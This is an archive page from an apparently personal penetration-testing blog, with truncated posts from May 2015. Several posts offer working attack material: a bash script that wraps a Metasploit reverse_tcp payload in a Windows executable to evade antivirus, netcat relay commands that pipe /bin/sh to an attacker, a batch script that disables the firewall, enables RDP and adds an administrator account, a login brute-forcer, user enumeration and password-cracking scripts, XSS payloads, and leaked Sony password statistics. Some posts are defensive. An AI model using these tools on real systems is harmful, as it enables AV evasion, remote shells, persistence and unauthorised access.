Posts

Showing posts from May, 2015

Raw shell meet Python pty

Today I was browsing the web and found the following article on Primal Securities blog about a Python Pseudo-Terminal.  Here is the link: http://www.primalsecurity.net/0xb-python-tutorial-pseudo-terminal/

In the event the link does not work in the future here is how to create a pseudo-terminal from a raw shell that you may receive on a box:

python -c "import pty;pty.spawn('/bin/bash')"


VMWare vmnet did not compile with Kali 3.18 upgrade

Today I was updating, upgrading and upgrading the distro.  After completing this task I ran into an issue reinstalling / recompilling the vmnet for VMWare.  After about 5 minutes of googling I found the solution and thought I would repost it below.

Site where I found the solution: http://askubuntu.com/questions/414783/unable-to-run-vmware-failed-to-build-vmnet

# - as root user $ cd /usr/lib/vmware/modules/source $ tar -xvf vmnet.tar # - edit the file vmnet-only/netif.c and replace the line that looks like dev = alloc_netdev(sizeof *netIf, deviceName, VNetNetIfSetup); to dev = alloc_netdev(sizeof *netIf, deviceName, NET_NAME_UNKNOWN, VNetNetIfSetup); $ tar -cvf vmnet.tar vmnet-only/ $ rm -rf vmnet-only/ This worked great, I did test the networking on a Windows 7 VM that I had and it seemed to work great!

bash script that builds a metasploit payload into a Windows Exe to bypass AV v5

Image
This script fixes the slowness that was in version 4, which has been removed and improves upon version 3 located prior to this post.  This version imitates creating a payload that looks like the one created by msfvenom and adds a series of them based on the randomness factor set in the script.  Also at the bottom it creates a packed executable from what is created using UPX.

With these modifications the detection ratio on virustotal is 3/56 as shown below in the screenshot and 2 of those detections were because the sample was packed.  Again this is to show anti-virus is good to have but not efficient for specific malware.


Below is a larger sample that was run against virustotal.  The randomness setting in the script was set to over 2,500 and the packed executable was detected by 1/56 AV's on virustotal.  The description of a Trojan.Win32.Diple is that is connects back to a specific port.  In reality no AV that scanned it actually caught this sample.  

The following script can be …

v3 bash script builds C program with metasploit payload to bypass AV

This version has been deprecated and a new up-to-date version can be found at this post.

Today I added a little more polish to my bash script that builds a compiled C program from a metasploit payload, compiles it with mingw, and then allows you to execute it on the remote host.  I have also made it more user friendly and easier to manipulate the values.  Some techniques to make it more random were also included.

#!/bin/bash

# This program compiles a C program with a meterpreter reverse_tcp payload in it that can then be executed on a windows host
# The program is setup to create a C program after it is compiled that will bypass most AV's
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
# Below are the only parameters you should have to change

payload="windows/meterpreter/reverse_tcp"
payloadLHOST="172.18.132.16"
payloadLPORT="33890"
msfvenomBadChars="\x00\xff"
msfvenomEncoder…

Windows 7 Events Generated when exploit/windows/smb/psexec is used by Metasploit

Image
With this walkthrough I wanted to note the events that are recorded by the event viewer of Windows 7 when you use exploit/windows/smb/psexec.  To setup the environment to record the necessary events the local policy was modified to the following settings in the below screenshot:


We are going to make the assumption that the hash for the Administrator account with SID 500 is compromised and is being used as shown in the below screenshot:



Also it can be observed that port 3389 is being used for payload.  This is because by default port 3389 TCP outbound is open on Windows 7.  With the above settings configured the exploit is then executed and successfully connects.  Below are the event logs that are generated on Windows 7 when the above actions are taken.

Event ID 4776 is created to identify the connecting computer.  The monitoring of this event for a non-standard workstation name provided as the "Source Workstation" could assist in identifying the intrusion.


Event ID 4672 iden…

Netcat Relay on Linux

Image
I purchased the book "Blue Team Handbook: Incident Response Edition" and it arrived today.  I skimmed the whole book and now I am going back through to look closer at a few items that caught my eye. One of them was the setting up of a netcat relay on linux.

The netcat relay works if you have 3 hosts:
Host 1 - 10.9.9.5 - Attacker
Host 2 - 10.9.9.10 - Compromised Victim (Pivot point or relay point)
Host 3 - 10.9.9.15 - Compromised Victim

On Host 1 you execute: "nc -l -p 4545".  This opens a listening port on your attacking computer.

On Host 3 you execute: "nc -l -p 2525 -e /bin/sh".  This opens a listening port and upon connect executes an interactive shell.

Then on Host 2 you execute the following commands:
"mknod backpipe p"
"nc 10.9.9.5 4545 0<backpipe | nc 10.9.9.15 2525 1>backpipe"

If a windows host was in the middle you would execute the following:
"echo nc 10.9.9.15 2525 > relay.bat"  # You need permission to write a…

Analysis of Passwords released by Wikileaks from the Sony Hack

Sony Pictures Entertainment on November 24, 2014 suffered a devastating attack from North Korea.  This attack caused the release of multiple documents and emails onto the internet.  On April 16, 2015, Wikileaks released an analysis and search system for 30,287 documents and 173,132 emails from this attack.  To voice my opinion, I am not in favor of Wikileaks releasing this information.

However, since the information is available, for this post I would like to analyze the information released focusing on evaluating the strength of the passwords found.

Looking at the page, https://wikileaks.com/sony/docs/, there is Directory #4.  After you expand this you find a directory structure that lists a variety of files.

From the files in this directory I was able to gather the following number of passwords:

2,323
Then the 3 most common passwords used:
123 times used - "password"
43 times used - "T3CSPH#G"
24 times used - "devl0p"

The number of characters per password…

Old Python Script to Brute-Force Metasploit Pro Web Interface

I wrote this python script to brute force a login to Metasploit Pro.  I doubt that it works for the current release because I believe they added a login threshold of 10 failed logins and it locks the account.

#!/usr/bin/python

import httplib

fpasswords = open('modRockyou.txt') for password in fpasswords: f = open('getResponse.txt','w')

conn = httplib.HTTPSConnection("127.0.0.1:3790") conn.request("GET", "/login") #conn.request("POST", "/user_sessions", postParam) r1 = conn.getresponse() f.write(r1.read()) f.close()

f = open('getResponse.txt') for line in f: if "authenticity_token" in line: auth_token = line[193:237] # Pulls the authenticity token out of the GET request #print "----" #print line[193:237] #print auth_token #print " " f.close()

header = r1.getheaders()

Batch Script for Windows to Disable Firewall, start Terminal Services, and Create a User

I wrote the following batch script for windows to disable the firewall, start terminal services and create a new local user.  I have tested this on Windows Server 2008.

@echo off

netsh firewall set opmode disable

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

sc config TermService start=auto

net start TermService

net user /add dalma iamin538!

net localgroup administrators dalma /add

Bash Script to Enumerate Users - OSVDB-637

I ran a Nikto scan and found the following vulnerability in the report that it produces:

"OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users)."

I then created the following bash script to run through a list of usernames to identify users that may exist:

#!/bin/bash
while read line
do

     wget http://www.domain.local/~$line &> output/$line.output.file

done < names.list
grep -l -i 'forbidden' output/*

The last statement will then identify the files that are proceeded by a username that return indicating the user account exists on the particular apache server.

Below is the information about the vulnerability from the OSVDB database...

http://osvdb.org/637
Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home dir…

Bash Script and References to Cracking 7z, zip or rar Password Protected Files

I found an old bash script that I wrote to conduct a dictionary attack against a 7z file.  Thought I would post it and then a few references of better ways of cracking zip passwords:

#!/bin/bash
# The script will conduct a dictionary attack on a 7z file.  It will delete the temporary file that it creates when the file fails to extract.
while read line
do
     7z x file.7z -p $line &> /dev/null
     fileSize = `stat -c %s file.7z
     if [ $fileSize -lt 5000 ]; then
          rm -f file.txt
     else
          exit 0
     fi

done < dictionary.file

A great blog post about using John the Ripper to crack Zip and rar files is located here.

Another tool that you can use is fcrackzip.  Here are a couple of references:
http://allanfeid.com/content/cracking-zip-files-fcrackzip
http://rarcrack.sourceforge.net/
http://linuxers.org/article/how-crack-zip-file-passwords-linux-using-fcrackzip

PHP Functions to Mitigate against XSS and other Threats

As I was reviewing the source code of "CMS Made Simple" I found 2 functions that they loosely applied and in some circumstances had not applied it at all.  It states in their source code that the functions are MIT licensed and taken from the cakephp.org project.  I have tested and posted them below.  The following page at OWASP has some better PHP functions to utilize to sanitize input/output.

/*
 * Sanitize input to prevent against XSS and other nasty stuff.
 * Taken from cakephp (http://cakephp.org)
 * Licensed under the MIT License
 *
 * @internal
 * @param string input
 * @return string
 */
function cleanValue($val) {
        if ($val == "") {
                return $val;
        }
        //Replace odd spaces with safe ones
        $val = str_replace(" ", " ", $val);
        $val = str_replace(chr(0xCA), "", $val);
        //Encode any HTML to entities (including \n --> <br />)
        $val = cleanHtml($val);
        //Double-check special …

SSH Tunnel with Proxychains

Thought I would quickly document how I have been utilizing SSH to create a tunnel and then using proxychains to access devices at and beyond the device the tunnel is connected to.

To establish the tunnel the following command is executed after the keys are setup to allow authentication with an SSH key:

ssh -i key.priv -p 22 thepcn3rd@7host.local -D 7500 -N -f

This connects to the host at 7host.local with the username thepcn3rd over port 22 with the key.priv.  Then it establishes on the local computer port 7500.  The best explanation for the -D switch I have found is in the man page for SSH:

-D [bind_address:]port
Specifies a local “dynamic” application-level port forwarding.  This works by allocating a socket to listen to port on the local side, optionally bound to the specified bind_address.  Whenever a connection is made to this port, the connection is forwarded over the secure channel, and the appli‐cation protocol is then used to determine where to connect to from the remote machine.…

XSS Reflected and Stored Testing with Script to Encode HTML

I was testing various methods of XSS and from the list below I found some that would work and some that would not.  Most of them in the list below I tested on an installed instance of "CMS Made Simple" on an Apache server I setup.

After testing for XSS on the instance I had installed, I submitted to them bugs #10511, #10512, #10513, #10514, #10515, #10517, #10518, #10519, and #10520.  Most of the bugs they felt were trivial because it was after an admin had accessed the CMS.  The one stored XSS that I found in the documentation I provided them in a comment caused stored XSS.

I used the XSS Filter Evasion Cheat Sheet and the Web Application Hackers Handbook version 2 to generate the following list:

### XSS Manual Testing Checklist ###
1. <script>alert('XSS');</script>
2. <script>alert("XSS");</script>
3. <script type='text/javascript'>alert('XSS');</script>
4. <script type="text/javascript">aler…

vbscript is it still used? - Quick scripts to gather Process and Service Information

I needed a quick script to gather the process name and executable path on multiple computers.  The following are the sites that I referenced:

http://stackoverflow.com/questions/17408185/vbscript-check-for-running-process-on-multiple-computers
http://www.hamiltonitblog.com/vbscript-get-list-of-running-processes-and-executable-path/
https://msdn.microsoft.com/en-us/library/aa394599%28v=vs.85%29.aspx

Below is the script that was mashed together:

strComputer = "."

Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("list.txt")

Do Until f.AtEndOfStream
    strComputer = f.ReadLine
    On Error Resume Next

    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" _
        & strComputer & "\root\cimv2")
    Set colProcessList = objWMIService.ExecQuery _
        ("Select * from Win32_Process")
    For Each objProcess in colProcessList
        Wscript.Echo "&…